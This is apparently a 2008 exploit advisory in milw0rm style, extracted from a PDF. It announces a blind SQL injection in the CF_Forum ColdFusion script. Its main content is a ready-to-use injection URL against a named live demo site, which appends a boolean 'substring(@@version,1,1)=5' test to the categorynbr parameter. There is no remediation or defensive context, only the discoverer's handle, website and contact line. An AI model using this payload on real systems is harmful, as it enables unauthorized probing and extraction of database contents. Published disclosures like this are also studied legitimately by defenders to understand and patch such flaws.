CF_Forum Blind SQL Injection Vulnerability.pdf

1 ########################################################################### 2 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−AlpHaNiX−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−# 3 ########################################################################### 4 5 #Found By : AlpHaNiX 6 #website : www.offensivetrack.org 7 #contact : AlpHa[AT]HACKER[DOT]BZ 8 9 ########################################################################### 10 11 #script : CF_FORUM 12 #download : null 13 #Demo : http://www.cfmsource.com/forums/htdocs/ 14 15 16 ########################################################################### 17 18 #Exploits : 19 20 −−=[SQL INJECTION]=−− 21 http://www.cfmsource.com/forums/htdocs/forummessages.cfm?topicnbr=2&categorynbr=2%20and%20substring(@@version,1,1)=5 22 23 #Greetz For 24 25 ########################################################################### 26 27 # milw0rm.com [2008−12−10] Page 1/1 CF_Forum Blind SQL Injection Vulnerability AlpHaNiX 12/10/2008